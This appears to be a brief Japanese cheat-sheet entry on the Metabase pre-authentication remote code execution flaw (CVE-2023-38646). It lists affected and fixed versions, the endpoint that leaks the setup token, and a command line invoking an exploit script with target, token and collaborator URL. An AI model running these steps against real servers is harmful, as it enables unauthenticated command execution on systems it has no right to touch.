
Metabase 事前認証 RCE

Metabaseオープンソース版 0.46.6.1 より前、および Metabase Enterprise 1.46.6.1 より前のバージョンでは、攻撃者がサーバの権限レベルで任意のコマンドを実行できます。認証は不要です。その他の修正バージョンは 0.45.4.1、1.45.4.1、0.44.7.1、1.44.7.1、0.43.7.2、1.43.7.2 です。
http://vulnerablehost.com/api/session/properties に移動する
python3 CVE-2023-38646.py -u <target> -t <setup-token> -c <collaborator-url>